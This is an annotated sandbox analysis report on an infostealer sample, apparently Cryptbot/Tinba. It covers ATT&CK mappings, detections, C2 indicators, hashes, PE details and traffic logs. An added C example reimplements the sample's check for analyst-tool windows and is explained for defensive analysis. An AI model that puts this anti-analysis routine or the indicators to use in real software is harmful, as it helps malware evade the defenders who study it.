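The anti-debug entries in this section are a protector's stock list: the window class and title probes (regmonclass, filemonclass, procmon_window_class, ollydbg, the Sysinternals title strings), the NTICE/SICE/SIWVID device opens, which are the driver names of the long-dead SoftICE kernel debugger, the DebugPort queries (NtQueryInformationProcess with ProcessDebugPort) and the HideFromDebugger thread flag (NtSetInformationThread with ThreadHideFromDebugger, which stops the thread from delivering debug events). The following is an added example, not code from the report or the sample, that reimplements the window probe; it generalizes from FindWindow() on exact names to an EnumWindows() walk with case-insensitive class matching and substring title matching, so a tool whose title has been extended still trips it. The name list is copied from the entries above; the window list used off Windows is constructed for the example.

```c
/* Added example (not from the Joe Sandbox report or the sample): the
 * analysis-tool window check, generalized from FindWindow() on exact names to
 * a case-insensitive scan over every top-level window. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Copied from the report's "Open window title or class name" entries. */
static const char *const kAnalysisWindowNames[] = {
    "regmonclass",
    "gbdyllo",
    "process monitor - sysinternals: www.sysinternals.com",
    "procmon_window_class",
    "registry monitor - sysinternals: www.sysinternals.com",
    "ollydbg",
    "filemonclass",
    "file monitor - sysinternals: www.sysinternals.com",
};
#define NAME_COUNT (sizeof kAnalysisWindowNames / sizeof kAnalysisWindowNames[0])

static int equals_nocase(const char *a, const char *b) {
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == '\0' && *b == '\0';
}

/* Case-insensitive substring test, written out because strcasestr is neither
 * standard C nor available on MSVC. */
static int contains_nocase(const char *hay, const char *needle) {
    size_t n = strlen(needle);
    for (; *hay; hay++) {
        size_t i = 0;
        while (i < n && hay[i] &&
               tolower((unsigned char)hay[i]) == tolower((unsigned char)needle[i]))
            i++;
        if (i == n) return 1;
    }
    return 0;
}

/* Index of the first list entry matched by the window's class name (compared
 * whole, as FindWindow does) or by its title (compared as a substring, so a
 * suffix appended to the title does not hide the tool); -1 when neither hits. */
static int classify_window(const char *class_name, const char *title) {
    for (size_t i = 0; i < NAME_COUNT; i++) {
        if (class_name && equals_nocase(class_name, kAnalysisWindowNames[i])) return (int)i;
        if (title && contains_nocase(title, kAnalysisWindowNames[i])) return (int)i;
    }
    return -1;
}

#ifdef _WIN32
#include <windows.h>
static BOOL CALLBACK on_window(HWND hwnd, LPARAM out) {
    char cls[256] = {0}, title[512] = {0};
    GetClassNameA(hwnd, cls, sizeof cls);
    GetWindowTextA(hwnd, title, sizeof title);
    int idx = classify_window(cls, title);
    if (idx < 0) return TRUE;   /* keep enumerating */
    *(int *)out = idx;
    return FALSE;               /* stop at the first hit */
}
static int scan_windows(void) {
    int found = -1;
    EnumWindows(on_window, (LPARAM)&found);
    return found;
}
#else
/* Constructed stand-in for EnumWindows() on non-Windows hosts. */
static int scan_windows(void) {
    static const char *const fake[][2] = {
        { "Chrome_WidgetWin_1", "Joe Sandbox - Google Chrome" },
        { "Notepad", "Untitled - Notepad" },
        { "PROCMON_WINDOW_CLASS",
          "Process Monitor - Sysinternals: www.sysinternals.com [constructed suffix]" },
    };
    for (size_t i = 0; i < sizeof fake / sizeof fake[0]; i++) {
        int idx = classify_window(fake[i][0], fake[i][1]);
        if (idx >= 0) return idx;
    }
    return -1;
}
#endif

int main(void) {
    int idx = scan_windows();
    if (idx >= 0)
        printf("analysis tool window found: %s\n", kAnalysisWindowNames[idx]);
    else
        printf("no analysis tool window found\n");
    return 0;
}
```

The practical consequence for analysis is the mirror image of the code: run the monitoring tools with their window class and title changed, or from a session the sample cannot enumerate, and do not rely on renaming procmon.exe alone, since the process-name blocklist in the memory strings above and this window probe are independent checks.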

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.10:49709 -> 194.87.47.113:80
MITRE ATT&CK Matrix (the number in parentheses is the count of report signatures mapped to the technique)

Execution: Command and Scripting Interpreter (2)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (1); DLL Side-Loading (1)
Defense Evasion: Virtualization/Sandbox Evasion (24); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (24); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1)
Collection: Archive Collected Data (11); Data from Local System (1)
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (4)
Reconnaissance, Resource Development, Initial Access, Credential Access, Exfiltration, Impact: no mapped signatures

Unmapped placeholder cells of the matrix (shown without a count in the original): Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties; Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet; Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media; Scheduled Task/Job, At, Cron, Launchd, Scheduled Task; Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts; OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials; Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC; Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture; Fallback Channels, Multiband Communication; Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits; Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Service Stop.

Antivirus detection (sample)

Source | Detection | Scanner | Label
Cc8zEnIDB2.exe | 53% | Virustotal |
Cc8zEnIDB2.exe | 45% | ReversingLabs | Win32.Infostealer.Tinba
Cc8zEnIDB2.exe | 100% | Avira | TR/Crypt.TPM.Gen
Cc8zEnIDB2.exe | 100% | Joe Sandbox ML |

No Antivirus matches for the remaining scan categories.

Antivirus detection (URLs)

Source | Detection | Scanner | Label
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF | 100% | Avira URL Cloud | malware
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963 | 100% | Avira URL Cloud | malware

Domains

Name | IP | Active | Malicious | Reputation
home.twentytk20pn.top | 194.87.47.113 | true | false | high
httpbin.org | 98.85.100.80 | true | false | high

Contacted URLs

Name | Malicious | Reputation
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322 | false | high
https://httpbin.org/ip | false | high

URLs from memory and binary strings

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | Cc8zEnIDB2.exe | false | | high
https://httpbin.org/ipbefore | Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html | Cc8zEnIDB2.exe, Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/hsts.html# | Cc8zEnIDB2.exe | false | | high
https://curl.se/docs/http-cookies.html# | Cc8zEnIDB2.exe | false | | high
https://curl.se/docs/alt-svc.html | Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322 | Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963 | Cc8zEnIDB2.exe, 00000000.00000003.1385943438.0000000001882000.00000004.00000020.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1396667628.0000000001885000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://.css | Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF | Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: malware | unknown

The curl.se documentation URLs are libcurl's own built-in warning strings, so the sample carries a statically linked libcurl for its HTTP traffic; https://httpbin.org/ip is a public echo service that returns the caller's external IP, which fits the host-fingerprinting fields seen in the memory strings. The http://.css, http://.jpg and http://html4/loose.dtd entries are fragments of embedded HTML-parsing code, not contacts.

Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
98.85.100.80 | httpbin.org | United States | 11351 | TWC-11351-NORTHEASTUS | false
194.87.47.113 | home.twentytk20pn.top | Russian Federation | 49392 | ASBAXETNRU | false

Note the inconsistency in these tables: home.twentytk20pn.top and 194.87.47.113 are marked Malicious false with reputation high, while both URL paths on that host are flagged malware by Avira URL Cloud, and the same path is the C2 URL shared with the Cryptbot samples listed in the context tables below. Treat the domain and the URL path as the indicators, not the reputation flag.
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578071
Start date and time: 2024-12-19 08:32:33 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled; EGA enabled; AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Cc8zEnIDB2.exe (renamed because the original name is a hash value)
Original Sample Name: a0d6c9d4d75289ffa8f7dbda90e3fce6.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information: Successful, ratio: 100%
HCA Information: Successful, ratio: 51%; Number of executed functions: 108; Number of non-executed functions: 49
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:33:35 | API Interceptor | 3x Sleep call for process: Cc8zEnIDB2.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                98.85.100.80Sh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                  rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                      NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        W6seF0MjGW.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          f1842FwKth.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                            aweqG2ssAY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              vH7JfdNi3c.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                U6mwWZlkzH.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                  KzLv0EXDs1.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    194.87.47.113rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    httpbin.orgSh2uIqqKqc.exeGet hashmaliciousCryptbotBrowse
                                                    • 98.85.100.80
                                                    rJvOqHxkuI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                    • 98.85.100.80
                                                    NWKk493xTy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 34.226.108.155
                                                    88S3zQTYpl.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 34.226.108.155
                                                    NVkyG9HAeY.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    W6seF0MjGW.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    • 98.85.100.80
                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
• 34.226.108.155
  | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc | Browse
• 34.226.108.155
  | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig | Browse
• 98.85.100.80
home.twentytk20pn.top | rJvOqHxkuI.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 194.87.47.113
  | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer | Browse
• 194.87.47.113
  | NWKk493xTy.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 194.87.47.113
  | 88S3zQTYpl.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 194.87.47.113
  | NVkyG9HAeY.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 194.87.47.113
  | file.exe | Get hash | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, Stealc | Browse
• 185.185.71.170
  | aweqG2ssAY.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.185.71.170
  | EnoSY3z6MP.exe | Get hash | malicious | Cryptbot | Browse
• 185.185.71.170
  | vH7JfdNi3c.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 185.185.71.170
  | JiZQEd33mn.exe | Get hash | malicious | Unknown | Browse
• 185.185.71.170
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TWC-11351-NORTHEASTUS | Sh2uIqqKqc.exe | Get hash | malicious | Cryptbot | Browse
• 98.85.100.80
  | rJvOqHxkuI.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 98.85.100.80
  | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer | Browse
• 98.85.100.80
  | NVkyG9HAeY.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 98.85.100.80
  | W6seF0MjGW.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 98.85.100.80
  | f1842FwKth.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 98.85.100.80
  | aweqG2ssAY.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 98.85.100.80
  | vH7JfdNi3c.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 98.85.100.80
  | U6mwWZlkzH.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 98.85.100.80
  | KzLv0EXDs1.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 98.85.100.80
ASBAXETNRU | rJvOqHxkuI.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 194.87.47.113
  | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer | Browse
• 194.87.47.113
  | NWKk493xTy.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 194.87.47.113
  | 88S3zQTYpl.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 194.87.47.113
  | NVkyG9HAeY.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 194.87.47.113
  | 17345062850621022e2a034193497843f70f72ad0e2a6d5b0e23bb6cd0de4c41fac1759029833.dat-decoded.exe | Get hash | malicious | AsyncRAT, DcRat | Browse
• 45.135.232.38
  | H6Lzd3cP3H.exe | Get hash | malicious | Unknown | Browse
• 194.87.47.99
  | k4c3YnjoBr.exe | Get hash | malicious | Cryptbot | Browse
• 194.87.47.99
  | 1SzdrH2oTL.exe | Get hash | malicious | Clipboard Hijacker, Cryptbot | Browse
• 194.87.47.99
  | b3astmode.arm5.elf | Get hash | malicious | Mirai | Browse
• 91.193.216.252
No context
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.9844420719493145
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Cc8zEnIDB2.exe
File size: 4'430'848 bytes
MD5: a0d6c9d4d75289ffa8f7dbda90e3fce6
SHA1: 3e3b99a9b625fbd216908a07754adab568dbef4d
SHA256: ca737deb8d7b8dc261e6dd95dd42d7316e670d886023a7e4369df4a518c972ce
SHA512: e77bf7e82acdc1bf647a5a4761db39cdf591d45d9ef57457aafbb9a087bbca9988c79be7376a7268d4642db2cbef2a41ff723c907bf04cf00f1fdc06e1982858
SSDEEP: 98304:j3ClGO5IimEwYIgsw7swMl6NFGS1DsZC2zm/hzB2hP:LCzILKtsw7sT6NcSr2zm/DG
TLSH: 672633DA3913B1D6C90F3DB73B53C0712B61A7B36C7BAAA1A5DD893611B6C94334208D
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U`g...............(.>D...d..2...........PD...@.................................{.C...@... ............................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xf4b000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676055E0 [Mon Dec 16 16:31:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F43E8828E5Ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61905f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x618000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb48db4 | 0x10 | sgmjipkl
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb48d64 | 0x18 | sgmjipkl
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
  | 0x1000 | 0x617000 | 0x283e00 | 1660f83a8e0675c06e505b9a35d3bef5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x618000 | 0x2b0 | 0x200 | d4eb0a728e2294c02d37f125f17428b1 | False | 0.796875 | data | 6.043817593037624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x619000 | 0x1000 | 0x200 | e8fbf92e0939d0cd4935f0fe539e974d | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
  | 0x61a000 | 0x37d000 | 0x200 | fbf814409299924205ce0cbfb2dec4d2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
sgmjipkl | 0x997000 | 0x1b3000 | 0x1b2200 | 79f2353f3f24750b2aec867f03361ab8 | False | 0.994249163187446 | data | 7.954959217473626 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pwaltzxf | 0xb4a000 | 0x1000 | 0x400 | a9245d2a7ac67f29b927be4dcd3cdefd | False | 0.8203125 | data | 6.337828414770522 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xb4b000 | 0x3000 | 0x2200 | 417f892b28c075b09b339a60aa67dce7 | False | 0.056870404411764705 | DOS executable (COM) | 0.7491515023128327 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xb48dc4 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 08:33:32.145123959 CET | 49703 | 443 | 192.168.2.10 | 98.85.100.80
Dec 19, 2024 08:33:32.145170927 CET | 443 | 49703 | 98.85.100.80 | 192.168.2.10
Dec 19, 2024 08:33:32.145253897 CET | 49703 | 443 | 192.168.2.10 | 98.85.100.80
Dec 19, 2024 08:33:32.159220934 CET | 49703 | 443 | 192.168.2.10 | 98.85.100.80
Dec 19, 2024 08:33:32.159261942 CET | 443 | 49703 | 98.85.100.80 | 192.168.2.10
Dec 19, 2024 08:33:33.899949074 CET | 443 | 49703 | 98.85.100.80 | 192.168.2.10
Dec 19, 2024 08:33:33.910361052 CET | 49703 | 443 | 192.168.2.10 | 98.85.100.80
Dec 19, 2024 08:33:33.910392046 CET | 443 | 49703 | 98.85.100.80 | 192.168.2.10
Dec 19, 2024 08:33:33.914108038 CET | 443 | 49703 | 98.85.100.80 | 192.168.2.10
Dec 19, 2024 08:33:33.914201021 CET | 49703 | 443 | 192.168.2.10 | 98.85.100.80
Dec 19, 2024 08:33:33.915527105 CET | 49703 | 443 | 192.168.2.10 | 98.85.100.80
Dec 19, 2024 08:33:33.915668964 CET | 49703 | 443 | 192.168.2.10 | 98.85.100.80
Dec 19, 2024 08:33:33.915689945 CET | 443 | 49703 | 98.85.100.80 | 192.168.2.10
Dec 19, 2024 08:33:33.961419106 CET | 49703 | 443 | 192.168.2.10 | 98.85.100.80
Dec 19, 2024 08:33:33.961452961 CET | 443 | 49703 | 98.85.100.80 | 192.168.2.10
Dec 19, 2024 08:33:34.008202076 CET | 49703 | 443 | 192.168.2.10 | 98.85.100.80
Dec 19, 2024 08:33:34.235872030 CET | 443 | 49703 | 98.85.100.80 | 192.168.2.10
Dec 19, 2024 08:33:34.236015081 CET | 443 | 49703 | 98.85.100.80 | 192.168.2.10
Dec 19, 2024 08:33:34.236100912 CET | 49703 | 443 | 192.168.2.10 | 98.85.100.80
Dec 19, 2024 08:33:34.294707060 CET | 49703 | 443 | 192.168.2.10 | 98.85.100.80
Dec 19, 2024 08:33:34.294743061 CET | 443 | 49703 | 98.85.100.80 | 192.168.2.10
Dec 19, 2024 08:33:35.321482897 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.441152096 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.441317081 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.442362070 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.562288046 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.562336922 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.562393904 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.562422991 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.562428951 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.562465906 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.562508106 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.562585115 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.562640905 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.562665939 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.562736034 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.562747002 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.562764883 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.562792063 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.562819004 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.562825918 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.562848091 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.562975883 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.682229996 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.682324886 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.682357073 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.682358027 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.682385921 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.682389975 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.682405949 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.682434082 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.682440042 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.682468891 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.682499886 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.682542086 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.725123882 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
